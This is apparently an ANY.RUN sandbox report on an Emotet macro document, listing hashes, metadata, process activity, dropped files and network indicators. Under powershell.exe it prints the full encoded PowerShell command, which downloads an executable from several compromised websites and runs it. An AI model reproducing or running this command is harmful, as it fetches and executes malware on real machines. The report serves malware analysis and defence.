analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

74_03463.doc

Full analysis: https://app.any.run/tasks/bc6b72ae-df8b-40c0-86dd-20c115e099be
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 08, 2019, 16:31:51
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
opendir
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Consequatur quia laboriosam., Author: Patrik tefanka, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Nov 8 06:25:00 2019, Last Saved Time/Date: Fri Nov 8 06:25:00 2019, Number of Pages: 1, Number of Words: 20, Number of Characters: 118, Security: 0
MD5:

7306137A3F95EA55AF446240B8E83DC3

SHA1:

308DB61138E5421168971551D4C14746829213B8

SHA256:

A79F99F860EC0B0F6F7ADC3233699B73671D013FB95C1213B8589A00487DAFF3

SSDEEP:

3072:Dpop1H+UaqFh5sr/SzFaSadGBrjC48+WZ/rOhh+/VtV1FYwDF+vdb3:Dpop1HNaqWSzGdD48+arOnsdFJAvdj

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 4080)
    • PowerShell script executed

      • powershell.exe (PID: 4080)
    • Executed via WMI

      • powershell.exe (PID: 4080)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2580)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2580)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 137
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 118
Words: 20
Pages: 1
ModifyDate: 2019:11:08 06:25:00
CreateDate: 2019:11:08 06:25:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Patrik Štefanka
Subject: -
Title: Consequatur quia laboriosam.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2580"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\74_03463.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4080powershell -enco JABBAGIAZgB2AGQAZwBqAGUAaABhAD0AJwBUAGoAegBxAGoAdQB4AGcAJwA7ACQASABuAG0AaABpAHoAYwBpAGkAIAA9ACAAJwA1ADAAMwAnADsAJABJAGQAbwBqAHkAbgBoAGEAYwBjAD0AJwBOAGcAcQBtAGgAZwBpAHoAZgBpAG4AdAB5ACcAOwAkAEQAbwB6AHAAbABtAHEAbwBwAG4APQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEgAbgBtAGgAaQB6AGMAaQBpACsAJwAuAGUAeABlACcAOwAkAFMAbwBsAHUAeQBhAHIAdwBzAHAAPQAnAFEAegBhAHcAeABxAGsAbQBrAHMAJwA7ACQAUQByAHIAdQByAHcAYgB5AHQAdQB4AG0AaQA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAJwArACcAZQAnACsAJwBjAHQAJwApACAAbgBFAHQALgBXAGUAYgBDAGwAaQBlAG4AVAA7ACQATQBmAHkAcQByAHIAawBqAGUAaQBqAG8APQAnAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBxAHUAYQBuAHQAdQBtAHMALgB0AGUAYwBoAG4AbwBsAG8AZwB5AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwBuAHoAYgB5ADcAegA2AGcALQBpADQAZwB0AGUAMAAtADIANQAyADkANgA3AC8AKgBoAHQAdABwADoALwAvAGEAdQBkAGkAaABkAC4AYgBlAC8AdwBwAC0AYQBkAG0AaQBuAC8AMQB4ADcAMQB3AG8AYgA2AC0AZwBrAHMAZABiAC0AMgA5ADIAMAA1ADAAMQAvACoAaAB0AHQAcAA6AC8ALwB3AGUAYgB0AGUAYwBoAGYAZQBlAGQAZQByAHMALgBpAG4ALwBuAGUAdwAvAGkAegBMAHAAUABwAC8AKgBoAHQAdABwADoALwAvAGIAbABvAGcALgBiAGUAcgB0AGEAbAB1AGkAcwBhAGQAZQB0AHQAZQAuAGQAZQAvAFcAbwByAGQAUAByAGUAcwBzAF8AMAAyAC8AdQA5AGQANQBiAGgAawB1AC0AMAAyAGYAaQBwAHEAYwAtADQANwAxADUALwAqAGgAdAB0AHAAcwA6AC8ALwBjAHkAYgBlAHIAYgBsAG8AeAAuAG0AeQAvAHMAaQB0AGUAbQBhAHAALwBlAHIAWABmAEsAbABRAC8AJwAuACIAUwBgAFAATABpAFQAIgAoACcAKgAnACkAOwAkAEEAZQBiAGUAegBwAHYAawBwAGUAcAA9ACcASQBlAHkAdgBqAHkAeABqAHUAcgB6ACcAOwBmAG8AcgBlAGEAYwBoACgAJABLAGwAdwBhAGgAcgBxAHEAYgByAGcAbgBrACAAaQBuACAAJABNAGYAeQBxAHIAcgBrAGoAZQBpAGoAbwApAHsAdAByAHkAewAkAFEAcgByAHUAcgB3AGIAeQB0AHUAeABtAGkALgAiAGQATwBXAE4AbABvAGEAYABEAGAARgBpAGAATABFACIAKAAkAEsAbAB3AGEAaAByAHEAcQBiAHIAZwBuAGsALAAgACQARABvAHoAcABsAG0AcQBvAHAAbgApADsAJABQAGMAbgB3AHkAYQBoAHUAdAB1AD0AJwBXAGMAdABtAHcAbQBrAG4AZgBwACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARABvAHoAcABsAG0AcQBvAHAAbgApAC4AIgBMAEUAYABOAGAARwB0AEgAIgAgAC0AZwBlACAAMgA5ADYAMAA4ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAdABhAGAAUgBUACIAKAAkAEQAbwB6AHAAbABtAHEAbwBwAG4AKQA7ACQAQQB1AGoAZwBmAG0AYwB5AG4AYQBzAD0AJwBGAHAAZQB3AG8AagBhAGoAbgB2AGUAeAAnADsAYgByAGUAYQBrADsAJABPAHIAaABhAHAAYwBnAHkAZgA9ACcATwBoAHcAbgBqAGMAYQBwAGUAZwB2ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAYwBsAGgAbQB5AGYAagBoAD0AJwBHAGcAYQBjAHUAbABnAGoAZwBqAGEAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 870
Read events
1 065
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
11

Dropped files

PID
Process
Filename
Type
2580WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA795.tmp.cvr
MD5:
SHA256:
4080powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LG5748K89KE0LXYSVZZH.temp
MD5:
SHA256:
2580WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56BB05.wmfwmf
MD5:3EB43DA5CFEC680B74BC8CCF261338DD
SHA256:1BD363BC0A4B8865A7D934215581FAB361864610336053117608BD5AA677A426
2580WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C0A8A85B.wmfwmf
MD5:76287672480101FA242548B7129F6778
SHA256:421314D51966B2B0FD7DDAE8D731ACC57D6F705F6CA9A4FA0EC8B2B5914B2E23
2580WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:D3E45E9E34C71A48C10FD945E9620BAF
SHA256:6CC7603DD408465CD9F4E0ED479443E49C34BDBCC43DE9FD1A9A1A1B8185537F
2580WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7A32889F.wmfwmf
MD5:97320431348BA5A60048F0B2BBE0B2AE
SHA256:70BBD1133A4430506811E8401FED5DE9C28AE3FD7CBFC9E33F6CC1DB9B7E2F3A
4080powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2580WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$_03463.docpgc
MD5:634D2F1CDBECC6D06E84BD7356E97360
SHA256:897657EBCFC38770A8E97A8E84C0B6CC4D9E9E26F5C4701B210865F5E4B2E623
4080powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b521.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2580WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18FF9FA9.wmfwmf
MD5:D34AEE56A5C2B014218D106977779CA4
SHA256:948563545394D476A04105063546ACF9FEBBB7A54E39C428C6BC45A2E0E3678A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4080
powershell.exe
GET
3.130.94.77:80
http://www.quantums.technology/wp-content/uploads/nzby7z6g-i4gte0-252967/
US
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4080
powershell.exe
3.130.94.77:80
www.quantums.technology
US
suspicious

DNS requests

Domain
IP
Reputation
www.quantums.technology
  • 3.130.94.77
suspicious

Threats

PID
Process
Class
Message
4080
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
4080
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
4080
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info